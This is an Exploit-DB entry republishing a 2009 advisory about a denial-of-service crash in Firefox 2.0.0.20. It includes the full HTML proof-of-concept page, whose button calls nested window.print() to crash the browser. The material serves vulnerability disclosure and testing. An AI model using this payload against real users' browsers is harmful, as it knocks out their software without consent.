Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service

EDB-ID:

32836


Author:

b3hz4d

Type:

dos


Platform:

Multiple

Date:

2009-03-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/33969/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.

Firefox 2.0.0.20 is vulnerable; other versions may also be affected.

<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML>